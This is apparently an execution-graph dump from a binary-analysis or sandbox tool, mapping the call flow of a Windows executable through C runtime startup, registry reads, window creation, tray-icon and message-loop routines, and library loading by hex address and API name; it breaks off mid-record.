                                                                                                                            execution_graph 103482 ee107d 103487 ee708b 103482->103487 103484 ee108c 103518 f02d40 103484->103518 103488 ee709b __write_nolock 103487->103488 103521 ee7667 103488->103521 103492 ee715a 103533 f0050b 103492->103533 103499 ee7667 59 API calls 103500 ee718b 103499->103500 103552 ee7d8c 103500->103552 103502 ee7194 RegOpenKeyExW 103503 f1e8b1 RegQueryValueExW 103502->103503 103507 ee71b6 Mailbox 103502->103507 103504 f1e943 RegCloseKey 103503->103504 103505 f1e8ce 103503->103505 103504->103507 103517 f1e955 _wcscat Mailbox __NMSG_WRITE 103504->103517 103556 f00db6 103505->103556 103507->103484 103508 f1e8e7 103566 ee522e 103508->103566 103509 ee79f2 59 API calls 103509->103517 103512 f1e90f 103569 ee7bcc 103512->103569 103514 f1e929 103514->103504 103516 ee3f74 59 API calls 103516->103517 103517->103507 103517->103509 103517->103516 103578 ee7de1 103517->103578 103646 f02c44 103518->103646 103520 ee1096 103522 f00db6 Mailbox 59 API calls 103521->103522 103523 ee7688 103522->103523 103524 f00db6 Mailbox 59 API calls 103523->103524 103525 ee7151 103524->103525 103526 ee4706 103525->103526 103582 f11940 103526->103582 103529 ee7de1 59 API calls 103530 ee4739 103529->103530 103584 ee4750 103530->103584 103532 ee4743 Mailbox 103532->103492 103534 f11940 __write_nolock 103533->103534 103535 f00518 GetFullPathNameW 103534->103535 103536 f0053a 103535->103536 103537 ee7bcc 59 API calls 103536->103537 103538 ee7165 103537->103538 103539 ee7cab 103538->103539 103540 ee7cbf 103539->103540 103541 f1ed4a 103539->103541 103606 ee7c50 103540->103606 103611 ee8029 103541->103611 103544 ee7173 103546 ee3f74 103544->103546 103545 f1ed55 __NMSG_WRITE _memmove 103547 ee3f82 103546->103547 103551 ee3fa4 _memmove 103546->103551 103549 f00db6 Mailbox 59 API calls 103547->103549 103548 f00db6 Mailbox 59 API calls 103550 ee3fb8 103548->103550 103549->103551 103550->103499 103551->103548 103553 ee7d99 103552->103553 103554 ee7da6 103552->103554 103553->103502 103555 f00db6 Mailbox 59 API calls 103554->103555 103555->103553 103559 f00dbe 103556->103559 103558 f00dd8 103558->103508 103559->103558 103561 f00ddc std::exception::exception 103559->103561 103614 f0571c 103559->103614 103631 f033a1 DecodePointer 103559->103631 103632 f0859b RaiseException 103561->103632 103563 f00e06 103633 f084d1 58 API calls _free 103563->103633 103565 f00e18 103565->103508 103567 f00db6 Mailbox 59 API calls 103566->103567 103568 ee5240 RegQueryValueExW 103567->103568 103568->103512 103568->103514 103570 ee7bd8 __NMSG_WRITE 103569->103570 103571 ee7c45 103569->103571 103573 ee7bee 103570->103573 103574 ee7c13 103570->103574 103572 ee7d2c 59 API calls 103571->103572 103577 ee7bf6 _memmove 103572->103577 103642 ee7f27 103573->103642 103575 ee8029 59 API calls 103574->103575 103575->103577 103577->103514 103579 ee7df0 __NMSG_WRITE _memmove 103578->103579 103580 f00db6 Mailbox 59 API calls 103579->103580 103581 ee7e2e 103580->103581 103581->103517 103583 ee4713 GetModuleFileNameW 103582->103583 103583->103529 103585 f11940 __write_nolock 103584->103585 103586 ee475d GetFullPathNameW 103585->103586 103587 ee477c 103586->103587 103588 ee4799 103586->103588 103589 ee7bcc 59 API calls 103587->103589 103590 ee7d8c 59 API calls 103588->103590 103591 ee4788 103589->103591 103590->103591 103594 ee7726 103591->103594 103595 ee7734 103594->103595 103598 ee7d2c 103595->103598 103597 ee4794 103597->103532 103599 ee7d3a 103598->103599 103601 ee7d43 _memmove 103598->103601 103599->103601 103602 ee7e4f 103599->103602 103601->103597 103603 ee7e62 103602->103603 103605 ee7e5f _memmove 103602->103605 103604 f00db6 Mailbox 59 API calls 103603->103604 103604->103605 103605->103601 103607 ee7c5f __NMSG_WRITE 103606->103607 103608 ee8029 59 API calls 103607->103608 103609 ee7c70 _memmove 103607->103609 103610 f1ed07 _memmove 103608->103610 103609->103544 103612 f00db6 Mailbox 59 API calls 103611->103612 103613 ee8033 103612->103613 103613->103545 103615 f05797 103614->103615 103621 f05728 103614->103621 103640 f033a1 DecodePointer 103615->103640 103617 f0579d 103641 f08b28 58 API calls __getptd_noexit 103617->103641 103620 f0575b RtlAllocateHeap 103620->103621 103630 f0578f 103620->103630 103621->103620 103623 f05783 103621->103623 103624 f05733 103621->103624 103628 f05781 103621->103628 103637 f033a1 DecodePointer 103621->103637 103638 f08b28 58 API calls __getptd_noexit 103623->103638 103624->103621 103634 f0a16b 58 API calls __NMSG_WRITE 103624->103634 103635 f0a1c8 58 API calls 5 library calls 103624->103635 103636 f0309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103624->103636 103639 f08b28 58 API calls __getptd_noexit 103628->103639 103630->103559 103631->103559 103632->103563 103633->103565 103634->103624 103635->103624 103637->103621 103638->103628 103639->103630 103640->103617 103641->103630 103643 ee7f39 103642->103643 103644 ee7f3f 103642->103644 103643->103577 103645 f00db6 Mailbox 59 API calls 103644->103645 103645->103643 103647 f02c50 type_info::_Type_info_dtor 103646->103647 103654 f03217 103647->103654 103653 f02c77 type_info::_Type_info_dtor 103653->103520 103671 f09c0b 103654->103671 103656 f02c59 103657 f02c88 DecodePointer DecodePointer 103656->103657 103658 f02cb5 103657->103658 103659 f02c65 103657->103659 103658->103659 103717 f087a4 59 API calls __gmtime64_s 103658->103717 103668 f02c82 103659->103668 103661 f02d18 EncodePointer EncodePointer 103661->103659 103662 f02cec 103662->103659 103666 f02d06 EncodePointer 103662->103666 103719 f08864 61 API calls 2 library calls 103662->103719 103663 f02cc7 103663->103661 103663->103662 103718 f08864 61 API calls 2 library calls 103663->103718 103666->103661 103667 f02d00 103667->103659 103667->103666 103720 f03220 103668->103720 103672 f09c1c 103671->103672 103673 f09c2f EnterCriticalSection 103671->103673 103678 f09c93 103672->103678 103673->103656 103675 f09c22 103675->103673 103702 f030b5 58 API calls 3 library calls 103675->103702 103679 f09c9f type_info::_Type_info_dtor 103678->103679 103680 f09ca8 103679->103680 103682 f09cc0 103679->103682 103703 f0a16b 58 API calls __NMSG_WRITE 103680->103703 103690 f09ce1 type_info::_Type_info_dtor 103682->103690 103706 f0881d 58 API calls 2 library calls 103682->103706 103683 f09cad 103704 f0a1c8 58 API calls 5 library calls 103683->103704 103686 f09cd5 103688 f09ceb 103686->103688 103689 f09cdc 103686->103689 103687 f09cb4 103705 f0309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103687->103705 103691 f09c0b __lock 58 API calls 103688->103691 103707 f08b28 58 API calls __getptd_noexit 103689->103707 103690->103675 103694 f09cf2 103691->103694 103696 f09d17 103694->103696 103697 f09cff 103694->103697 103709 f02d55 103696->103709 103708 f09e2b InitializeCriticalSectionAndSpinCount 103697->103708 103700 f09d0b 103715 f09d33 LeaveCriticalSection _doexit 103700->103715 103703->103683 103704->103687 103706->103686 103707->103690 103708->103700 103710 f02d5e RtlFreeHeap 103709->103710 103714 f02d87 __dosmaperr 103709->103714 103711 f02d73 103710->103711 103710->103714 103716 f08b28 58 API calls __getptd_noexit 103711->103716 103713 f02d79 GetLastError 103713->103714 103714->103700 103715->103690 103716->103713 103717->103663 103718->103662 103719->103667 103723 f09d75 LeaveCriticalSection 103720->103723 103722 f02c87 103722->103653 103723->103722 103724 f07c56 103725 f07c62 type_info::_Type_info_dtor 103724->103725 103761 f09e08 GetStartupInfoW 103725->103761 103728 f07c67 103763 f08b7c GetProcessHeap 103728->103763 103729 f07cbf 103730 f07cca 103729->103730 103846 f07da6 58 API calls 3 library calls 103729->103846 103764 f09ae6 103730->103764 103733 f07cd0 103734 f07cdb __RTC_Initialize 103733->103734 103847 f07da6 58 API calls 3 library calls 103733->103847 103785 f0d5d2 103734->103785 103737 f07cea 103738 f07cf6 GetCommandLineW 103737->103738 103848 f07da6 58 API calls 3 library calls 103737->103848 103804 f14f23 GetEnvironmentStringsW 103738->103804 103741 f07cf5 103741->103738 103744 f07d10 103748 f07d1b 103744->103748 103849 f030b5 58 API calls 3 library calls 103744->103849 103747 f07d21 103749 f07d2c 103747->103749 103850 f030b5 58 API calls 3 library calls 103747->103850 103814 f14d58 103748->103814 103828 f030ef 103749->103828 103752 f07d34 103753 f07d3f __wwincmdln 103752->103753 103851 f030b5 58 API calls 3 library calls 103752->103851 103834 ee47d0 103753->103834 103756 f07d53 103757 f07d62 103756->103757 103852 f03358 58 API calls _doexit 103756->103852 103853 f030e0 58 API calls _doexit 103757->103853 103760 f07d67 type_info::_Type_info_dtor 103762 f09e1e 103761->103762 103762->103728 103763->103729 103854 f03187 36 API calls 2 library calls 103764->103854 103766 f09aeb 103855 f09d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 103766->103855 103768 f09af0 103769 f09af4 103768->103769 103857 f09d8a TlsAlloc 103768->103857 103856 f09b5c 61 API calls 2 library calls 103769->103856 103772 f09af9 103772->103733 103773 f09b06 103773->103769 103774 f09b11 103773->103774 103858 f087d5 103774->103858 103776 f09b53 103866 f09b5c 61 API calls 2 library calls 103776->103866 103780 f09b58 103780->103733 103781 f09b32 103781->103776 103782 f09b38 103781->103782 103865 f09a33 58 API calls 4 library calls 103782->103865 103784 f09b40 GetCurrentThreadId 103784->103733 103786 f0d5de type_info::_Type_info_dtor 103785->103786 103787 f09c0b __lock 58 API calls 103786->103787 103788 f0d5e5 103787->103788 103789 f087d5 __calloc_crt 58 API calls 103788->103789 103790 f0d5f6 103789->103790 103791 f0d661 GetStartupInfoW 103790->103791 103792 f0d601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 103790->103792 103797 f0d7a5 103791->103797 103800 f0d676 103791->103800 103792->103737 103793 f0d86d 103880 f0d87d LeaveCriticalSection _doexit 103793->103880 103795 f087d5 __calloc_crt 58 API calls 103795->103800 103796 f0d7f2 GetStdHandle 103796->103797 103797->103793 103797->103796 103799 f0d805 GetFileType 103797->103799 103879 f09e2b InitializeCriticalSectionAndSpinCount 103797->103879 103798 f0d6c4 103798->103797 103801 f0d6f8 GetFileType 103798->103801 103878 f09e2b InitializeCriticalSectionAndSpinCount 103798->103878 103799->103797 103800->103795 103800->103797 103800->103798 103801->103798 103805 f14f34 103804->103805 103806 f07d06 103804->103806 103881 f0881d 58 API calls 2 library calls 103805->103881 103810 f14b1b GetModuleFileNameW 103806->103810 103808 f14f70 FreeEnvironmentStringsW 103808->103806 103809 f14f5a _memmove 103809->103808 103811 f14b4f _wparse_cmdline 103810->103811 103813 f14b8f _wparse_cmdline 103811->103813 103882 f0881d 58 API calls 2 library calls 103811->103882 103813->103744 103815 f14d71 __NMSG_WRITE 103814->103815 103819 f14d69 103814->103819 103816 f087d5 __calloc_crt 58 API calls 103815->103816 103824 f14d9a __NMSG_WRITE 103816->103824 103817 f14df1 103818 f02d55 _free 58 API calls 103817->103818 103818->103819 103819->103747 103820 f087d5 __calloc_crt 58 API calls 103820->103824 103821 f14e16 103822 f02d55 _free 58 API calls 103821->103822 103822->103819 103824->103817 103824->103819 103824->103820 103824->103821 103825 f14e2d 103824->103825 103883 f14607 58 API calls __gmtime64_s 103824->103883 103884 f08dc6 IsProcessorFeaturePresent 103825->103884 103827 f14e39 103827->103747 103829 f030fb __IsNonwritableInCurrentImage 103828->103829 103907 f0a4d1 103829->103907 103831 f03119 __initterm_e 103832 f02d40 __cinit 67 API calls 103831->103832 103833 f03138 __cinit __IsNonwritableInCurrentImage 103831->103833 103832->103833 103833->103752 103835 ee47ea 103834->103835 103845 ee4889 103834->103845 103836 ee4824 IsThemeActive 103835->103836 103910 f0336c 103836->103910 103840 ee4850 103922 ee48fd SystemParametersInfoW SystemParametersInfoW 103840->103922 103842 ee485c 103923 ee3b3a 103842->103923 103844 ee4864 SystemParametersInfoW 103844->103845 103845->103756 103846->103730 103847->103734 103848->103741 103852->103757 103853->103760 103854->103766 103855->103768 103856->103772 103857->103773 103860 f087dc 103858->103860 103861 f08817 103860->103861 103863 f087fa 103860->103863 103867 f151f6 103860->103867 103861->103776 103864 f09de6 TlsSetValue 103861->103864 103863->103860 103863->103861 103875 f0a132 Sleep 103863->103875 103864->103781 103865->103784 103866->103780 103868 f15201 103867->103868 103873 f1521c 103867->103873 103869 f1520d 103868->103869 103868->103873 103876 f08b28 58 API calls __getptd_noexit 103869->103876 103871 f1522c HeapAlloc 103872 f15212 103871->103872 103871->103873 103872->103860 103873->103871 103873->103872 103877 f033a1 DecodePointer 103873->103877 103875->103863 103876->103872 103877->103873 103878->103798 103879->103797 103880->103792 103881->103809 103882->103813 103883->103824 103885 f08dd1 103884->103885 103890 f08c59 103885->103890 103889 f08dec 103889->103827 103891 f08c73 _memset __call_reportfault 103890->103891 103892 f08c93 IsDebuggerPresent 103891->103892 103898 f0a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103892->103898 103895 f08d7a 103897 f0a140 GetCurrentProcess TerminateProcess 103895->103897 103896 f08d57 __call_reportfault 103899 f0c5f6 103896->103899 103897->103889 103898->103896 103900 f0c600 IsProcessorFeaturePresent 103899->103900 103901 f0c5fe 103899->103901 103903 f1590a 103900->103903 103901->103895 103906 f158b9 5 API calls 2 library calls 103903->103906 103905 f159ed 103905->103895 103906->103905 103908 f0a4d4 EncodePointer 103907->103908 103908->103908 103909 f0a4ee 103908->103909 103909->103831 103911 f09c0b __lock 58 API calls 103910->103911 103912 f03377 DecodePointer EncodePointer 103911->103912 103975 f09d75 LeaveCriticalSection 103912->103975 103914 ee4849 103915 f033d4 103914->103915 103916 f033f8 103915->103916 103917 f033de 103915->103917 103916->103840 103917->103916 103976 f08b28 58 API calls __getptd_noexit 103917->103976 103919 f033e8 103977 f08db6 9 API calls __gmtime64_s 103919->103977 103921 f033f3 103921->103840 103922->103842 103924 ee3b47 __write_nolock 103923->103924 103925 ee7667 59 API calls 103924->103925 103926 ee3b51 GetCurrentDirectoryW 103925->103926 103978 ee3766 103926->103978 103928 ee3b7a IsDebuggerPresent 103929 f1d272 MessageBoxA 103928->103929 103930 ee3b88 103928->103930 103932 f1d28c 103929->103932 103931 ee3c61 103930->103931 103930->103932 103933 ee3ba5 103930->103933 103934 ee3c68 SetCurrentDirectoryW 103931->103934 104188 ee7213 59 API calls Mailbox 103932->104188 104059 ee7285 103933->104059 103937 ee3c75 Mailbox 103934->103937 103937->103844 103938 f1d29c 103943 f1d2b2 SetCurrentDirectoryW 103938->103943 103940 ee3bc3 GetFullPathNameW 103941 ee7bcc 59 API calls 103940->103941 103942 ee3bfe 103941->103942 104075 ef092d 103942->104075 103943->103937 103946 ee3c1c 103947 ee3c26 103946->103947 104189 f3874b AllocateAndInitializeSid CheckTokenMembership FreeSid 103946->104189 104091 ee3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103947->104091 103950 f1d2cf 103950->103947 103954 f1d2e0 103950->103954 103953 ee3c30 103955 ee3c43 103953->103955 104099 ee434a 103953->104099 103956 ee4706 61 API calls 103954->103956 104110 ef09d0 103955->104110 103959 f1d2e8 103956->103959 103960 ee7de1 59 API calls 103959->103960 103961 f1d2f5 103960->103961 103963 f1d324 103961->103963 103964 f1d2ff 103961->103964 103962 ee3c4e 103962->103931 104187 ee443a Shell_NotifyIconW _memset 103962->104187 103967 ee7cab 59 API calls 103963->103967 103966 ee7cab 59 API calls 103964->103966 103968 f1d30a 103966->103968 103969 f1d320 GetForegroundWindow ShellExecuteW 103967->103969 104190 ee7b2e 103968->104190 103973 f1d354 Mailbox 103969->103973 103973->103931 103975->103914 103976->103919 103977->103921 103979 ee7667 59 API calls 103978->103979 103980 ee377c 103979->103980 104199 ee3d31 103980->104199 103982 ee379a 103983 ee4706 61 API calls 103982->103983 103984 ee37ae 103983->103984 103985 ee7de1 59 API calls 103984->103985 103986 ee37bb 103985->103986 104213 ee4ddd 103986->104213 103989 f1d173 104284 f4955b 103989->104284 103990 ee37dc Mailbox 104237 ee8047 103990->104237 103994 f1d192 103995 f02d55 _free 58 API calls 103994->103995 103998 f1d19f 103995->103998 104000 ee4e4a 84 API calls 103998->104000 104002 f1d1a8 104000->104002 104006 ee3ed0 59 API calls 104002->104006 104003 ee7de1 59 API calls 104004 ee3808 104003->104004 104244 ee84c0 104004->104244 104008 f1d1c3 104006->104008 104007 ee381a Mailbox 104009 ee7de1 59 API calls 104007->104009 104010 ee3ed0 59 API calls 104008->104010 104011 ee3840 104009->104011 104012 f1d1df 104010->104012 104013 ee84c0 69 API calls 104011->104013 104014 ee4706 61 API calls 104012->104014 104016 ee384f Mailbox 104013->104016 104015 f1d204 104014->104015 104017 ee3ed0 59 API calls 104015->104017 104019 ee7667 59 API calls 104016->104019 104018 f1d210 104017->104018 104020 ee8047 59 API calls 104018->104020 104021 ee386d 104019->104021 104022 f1d21e 104020->104022 104248 ee3ed0 104021->104248 104024 ee3ed0 59 API calls 104022->104024 104026 f1d22d 104024->104026 104032 ee8047 59 API calls 104026->104032 104028 ee3887 104028->104002 104029 ee3891 104028->104029 104030 f02efd _W_store_winword 60 API calls 104029->104030 104031 ee389c 104030->104031 104031->104008 104033 ee38a6 104031->104033 104034 f1d24f 104032->104034 104035 f02efd _W_store_winword 60 API calls 104033->104035 104036 ee3ed0 59 API calls 104034->104036 104037 ee38b1 104035->104037 104039 f1d25c 104036->104039 104037->104012 104038 ee38bb 104037->104038 104040 f02efd _W_store_winword 60 API calls 104038->104040 104039->104039 104041 ee38c6 104040->104041 104041->104026 104042 ee3907 104041->104042 104043 ee3ed0 59 API calls 104041->104043 104042->104026 104044 ee3914 104042->104044 104045 ee38ea 104043->104045 104264 ee92ce 104044->104264 104047 ee8047 59 API calls 104045->104047 104049 ee38f8 104047->104049 104052 ee3ed0 59 API calls 104049->104052 104052->104042 104054 ee928a 59 API calls 104056 ee394f 104054->104056 104055 ee8ee0 60 API calls 104055->104056 104056->104054 104056->104055 104057 ee3ed0 59 API calls 104056->104057 104058 ee3995 Mailbox 104056->104058 104057->104056 104058->103928 104060 ee7292 __write_nolock 104059->104060 104061 f1ea22 _memset 104060->104061 104062 ee72ab 104060->104062 104065 f1ea3e GetOpenFileNameW 104061->104065 104063 ee4750 60 API calls 104062->104063 104064 ee72b4 104063->104064 105160 f00791 104064->105160 104067 f1ea8d 104065->104067 104068 ee7bcc 59 API calls 104067->104068 104070 f1eaa2 104068->104070 104070->104070 104072 ee72c9 105178 ee686a 104072->105178 104076 ef093a __write_nolock 104075->104076 105419 ee6d80 104076->105419 104078 ef093f 104079 ee3c14 104078->104079 105430 ef119e 89 API calls 104078->105430 104079->103938 104079->103946 104081 ef094c 104081->104079 105431 ef3ee7 91 API calls Mailbox 104081->105431 104083 ef0955 104083->104079 104084 ef0959 GetFullPathNameW 104083->104084 104085 ee7bcc 59 API calls 104084->104085 104086 ef0985 104085->104086 104087 ee7bcc 59 API calls 104086->104087 104088 ef0992 104087->104088 104089 f24cab _wcscat 104088->104089 104090 ee7bcc 59 API calls 104088->104090 104090->104079 104092 f1d261 104091->104092 104093 ee3ab0 LoadImageW RegisterClassExW 104091->104093 105474 ee47a0 LoadImageW EnumResourceNamesW 104092->105474 105473 ee3041 7 API calls 104093->105473 104096 ee3b34 104098 ee39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104096->104098 104097 f1d26a 104098->103953 104100 ee4375 _memset 104099->104100 105475 ee4182 104100->105475 104103 ee43fa 104105 ee4414 Shell_NotifyIconW 104103->104105 104106 ee4430 Shell_NotifyIconW 104103->104106 104107 ee4422 104105->104107 104106->104107 105479 ee407c 104107->105479 104111 f24cc3 104110->104111 104123 ef09f5 104110->104123 105641 f49e4a 89 API calls 4 library calls 104111->105641 104113 ef0cfa 104113->103962 104115 ef0ee4 104115->104113 104118 ef0a4b PeekMessageW 104186 ef0a05 Mailbox 104118->104186 104122 ef0ce4 104122->104113 105638 ef1070 10 API calls Mailbox 104122->105638 104123->104186 105642 ee9e5d 60 API calls 104123->105642 105643 f36349 331 API calls 104123->105643 104124 f24e81 Sleep 104124->104186 104129 ef0ea5 TranslateMessage DispatchMessageW 104130 ef0e43 PeekMessageW 104129->104130 104130->104186 104131 f24d50 TranslateAcceleratorW 104131->104130 104131->104186 104132 f00db6 59 API calls Mailbox 104132->104186 104133 ef0d13 timeGetTime 104133->104186 104134 f2581f WaitForSingleObject 104139 f2583c GetExitCodeProcess CloseHandle 104134->104139 104134->104186 104136 ef0e5f Sleep 104172 ef0e70 Mailbox 104136->104172 104137 ee8047 59 API calls 104137->104186 104138 ee7667 59 API calls 104138->104172 104170 ef0f95 104139->104170 104140 f25af8 Sleep 104140->104172 104142 eeb73c 304 API calls 104142->104186 104144 f0049f timeGetTime 104144->104172 104145 ef0f4e timeGetTime 105640 ee9e5d 60 API calls 104145->105640 104148 f25b8f GetExitCodeProcess 104153 f25ba5 WaitForSingleObject 104148->104153 104154 f25bbb CloseHandle 104148->104154 104151 f65f25 110 API calls 104151->104172 104152 eeb7dd 109 API calls 104152->104172 104153->104154 104153->104186 104154->104172 104156 f25874 104156->104170 104157 ee9e5d 60 API calls 104157->104186 104158 f25c17 Sleep 104158->104186 104159 f25078 Sleep 104159->104186 104162 ee7de1 59 API calls 104162->104172 104166 ee9ea0 304 API calls 104166->104186 104170->103962 104172->104138 104172->104144 104172->104148 104172->104151 104172->104152 104172->104156 104172->104158 104172->104159 104172->104162 104172->104170 104172->104186 105678 f42408 60 API calls 104172->105678 105679 ee9e5d 60 API calls 104172->105679 105680 ee89b3 69 API calls Mailbox 104172->105680 105681 eeb73c 331 API calls 104172->105681 105682 f364da 60 API calls 104172->105682 105683 f45244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104172->105683 105684 f43c55 66 API calls Mailbox 104172->105684 104174 f49e4a 89 API calls 104174->104186 104175 ee9c90 59 API calls Mailbox 104175->104186 104176 ee84c0 69 API calls 104176->104186 104177 f3617e 59 API calls Mailbox 104177->104186 104179 ee7de1 59 API calls 104179->104186 104180 ee89b3 69 API calls 104180->104186 104181 f255d5 VariantClear 104181->104186 104182 ee8cd4 59 API calls Mailbox 104182->104186 104183 f2566b VariantClear 104183->104186 104184 f25419 VariantClear 104184->104186 104185 f36e8f 59 API calls 104185->104186 104186->104118 104186->104122 104186->104124 104186->104129 104186->104130 104186->104131 104186->104132 104186->104133 104186->104134 104186->104136 104186->104137 104186->104140 104186->104142 104186->104145 104186->104157 104186->104166 104186->104170 104186->104172 104186->104174 104186->104175 104186->104176 104186->104177 104186->104179 104186->104180 104186->104181 104186->104182 104186->104183 104186->104184 104186->104185 105502 eee6a0 104186->105502 105533 eef460 104186->105533 105552 ee31ce 104186->105552 105557 eee420 331 API calls 104186->105557 105558 eefce0 104186->105558 105644 f66018 59 API calls 104186->105644 105645 f49a15 59 API calls Mailbox 104186->105645 105646 f3d4f2 59 API calls 104186->105646 105647 ee9837 104186->105647 105665 f360ef 59 API calls 2 library calls 104186->105665 105666 ee8401 59 API calls 104186->105666 105667 ee82df 104186->105667 104187->103931 104188->103938 104189->103950 104191 f1ec6b 104190->104191 104192 ee7b40 104190->104192 105999 f37bdb 59 API calls _memmove 104191->105999 105993 ee7a51 104192->105993 104195 ee7b4c 104196 f1ec75 104197 ee8047 59 API calls 104196->104197 104200 ee3d3e __write_nolock 104199->104200 104201 ee7bcc 59 API calls 104200->104201 104207 ee3ea4 Mailbox 104200->104207 104203 ee3d70 104201->104203 104210 ee3da6 Mailbox 104203->104210 104325 ee79f2 104203->104325 104204 ee79f2 59 API calls 104204->104210 104205 ee3e77 104206 ee7de1 59 API calls 104205->104206 104205->104207 104209 ee3e98 104206->104209 104207->103982 104208 ee7de1 59 API calls 104208->104210 104211 ee3f74 59 API calls 104209->104211 104210->104204 104210->104205 104210->104207 104210->104208 104212 ee3f74 59 API calls 104210->104212 104211->104207 104212->104210 104328 ee4bb5 104213->104328 104218 ee4e08 LoadLibraryExW 104338 ee4b6a 104218->104338 104219 f1d8e6 104221 ee4e4a 84 API calls 104219->104221 104222 f1d8ed 104221->104222 104224 ee4b6a 3 API calls 104222->104224 104226 f1d8f5 104224->104226 104364 ee4f0b 104226->104364 104227 ee4e2f 104227->104226 104228 ee4e3b 104227->104228 104230 ee4e4a 84 API calls 104228->104230 104232 ee37d4 104230->104232 104232->103989 104232->103990 104234 f1d91c 104372 ee4ec7 104234->104372 104236 f1d929 104238 ee37ef 104237->104238 104239 ee8052 104237->104239 104241 ee928a 104238->104241 104799 ee7f77 59 API calls 2 library calls 104239->104799 104242 f00db6 Mailbox 59 API calls 104241->104242 104243 ee37fb 104242->104243 104243->104003 104245 ee84cb 104244->104245 104247 ee84f2 104245->104247 104800 ee89b3 69 API calls Mailbox 104245->104800 104247->104007 104249 ee3eda 104248->104249 104250 ee3ef3 104248->104250 104251 ee8047 59 API calls 104249->104251 104252 ee7bcc 59 API calls 104250->104252 104253 ee3879 104251->104253 104252->104253 104254 f02efd 104253->104254 104255 f02f09 104254->104255 104256 f02f7e 104254->104256 104260 f02f2e 104255->104260 104801 f08b28 58 API calls __getptd_noexit 104255->104801 104803 f02f90 60 API calls 3 library calls 104256->104803 104259 f02f8b 104259->104028 104260->104028 104261 f02f15 104802 f08db6 9 API calls __gmtime64_s 104261->104802 104263 f02f20 104263->104028 104265 ee92d6 104264->104265 104266 f00db6 Mailbox 59 API calls 104265->104266 104267 ee92e4 104266->104267 104268 ee3924 104267->104268 104804 ee91fc 59 API calls Mailbox 104267->104804 104270 ee9050 104268->104270 104805 ee9160 104270->104805 104272 f00db6 Mailbox 59 API calls 104273 ee3932 104272->104273 104275 ee8ee0 104273->104275 104274 ee905f 104274->104272 104274->104273 104276 f1f17c 104275->104276 104280 ee8ef7 104275->104280 104276->104280 104832 ee8bdb 59 API calls Mailbox 104276->104832 104278 ee8ff8 104281 f00db6 Mailbox 59 API calls 104278->104281 104279 ee9040 104819 ee9d3c 104279->104819 104280->104278 104280->104279 104283 ee8fff 104280->104283 104281->104283 104283->104056 104285 ee4ee5 85 API calls 104284->104285 104286 f495ca 104285->104286 104835 f49734 104286->104835 104289 ee4f0b 74 API calls 104290 f495f7 104289->104290 104291 ee4f0b 74 API calls 104290->104291 104292 f49607 104291->104292 104293 ee4f0b 74 API calls 104292->104293 104294 f49622 104293->104294 104295 ee4f0b 74 API calls 104294->104295 104296 f4963d 104295->104296 104297 ee4ee5 85 API calls 104296->104297 104298 f49654 104297->104298 104299 f0571c std::exception::_Copy_str 58 API calls 104298->104299 104300 f4965b 104299->104300 104301 f0571c std::exception::_Copy_str 58 API calls 104300->104301 104302 f49665 104301->104302 104303 ee4f0b 74 API calls 104302->104303 104304 f49679 104303->104304 104305 f49109 GetSystemTimeAsFileTime 104304->104305 104306 f4968c 104305->104306 104307 f496b6 104306->104307 104308 f496a1 104306->104308 104309 f496bc 104307->104309 104310 f4971b 104307->104310 104311 f02d55 _free 58 API calls 104308->104311 104841 f48b06 104309->104841 104313 f02d55 _free 58 API calls 104310->104313 104314 f496a7 104311->104314 104316 f1d186 104313->104316 104317 f02d55 _free 58 API calls 104314->104317 104316->103994 104319 ee4e4a 104316->104319 104317->104316 104318 f02d55 _free 58 API calls 104318->104316 104320 ee4e5b 104319->104320 104321 ee4e54 104319->104321 104323 ee4e6a 104320->104323 104324 ee4e7b FreeLibrary 104320->104324 104322 f053a6 __fcloseall 83 API calls 104321->104322 104322->104320 104323->103994 104324->104323 104326 ee7e4f 59 API calls 104325->104326 104327 ee79fd 104326->104327 104327->104203 104377 ee4c03 104328->104377 104331 ee4bec FreeLibrary 104332 ee4bf5 104331->104332 104335 f0525b 104332->104335 104333 ee4c03 2 API calls 104334 ee4bdc 104333->104334 104334->104331 104334->104332 104381 f05270 104335->104381 104337 ee4dfc 104337->104218 104337->104219 104539 ee4c36 104338->104539 104341 ee4b8f 104343 ee4baa 104341->104343 104344 ee4ba1 FreeLibrary 104341->104344 104342 ee4c36 2 API calls 104342->104341 104345 ee4c70 104343->104345 104344->104343 104346 f00db6 Mailbox 59 API calls 104345->104346 104347 ee4c85 104346->104347 104348 ee522e 59 API calls 104347->104348 104349 ee4c91 _memmove 104348->104349 104350 ee4ccc 104349->104350 104352 ee4d89 104349->104352 104353 ee4dc1 104349->104353 104351 ee4ec7 69 API calls 104350->104351 104361 ee4cd5 104351->104361 104543 ee4e89 CreateStreamOnHGlobal 104352->104543 104554 f4991b 95 API calls 104353->104554 104356 ee4f0b 74 API calls 104356->104361 104358 ee4d69 104358->104227 104359 f1d8a7 104360 ee4ee5 85 API calls 104359->104360 104362 f1d8bb 104360->104362 104361->104356 104361->104358 104361->104359 104549 ee4ee5 104361->104549 104363 ee4f0b 74 API calls 104362->104363 104363->104358 104365 ee4f1d 104364->104365 104366 f1d9cd 104364->104366 104578 f055e2 104365->104578 104369 f49109 104776 f48f5f 104369->104776 104371 f4911f 104371->104234 104373 ee4ed6 104372->104373 104376 f1d990 104372->104376 104781 f05c60 104373->104781 104375 ee4ede 104375->104236 104378 ee4bd0 104377->104378 104379 ee4c0c LoadLibraryA 104377->104379 104378->104333 104378->104334 104379->104378 104380 ee4c1d GetProcAddress 104379->104380 104380->104378 104384 f0527c type_info::_Type_info_dtor 104381->104384 104382 f0528f 104430 f08b28 58 API calls __getptd_noexit 104382->104430 104384->104382 104386 f052c0 104384->104386 104385 f05294 104431 f08db6 9 API calls __gmtime64_s 104385->104431 104400 f104e8 104386->104400 104389 f052c5 104390 f052db 104389->104390 104391 f052ce 104389->104391 104392 f05305 104390->104392 104393 f052e5 104390->104393 104432 f08b28 58 API calls __getptd_noexit 104391->104432 104415 f10607 104392->104415 104433 f08b28 58 API calls __getptd_noexit 104393->104433 104395 f0529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 104395->104337 104401 f104f4 type_info::_Type_info_dtor 104400->104401 104402 f09c0b __lock 58 API calls 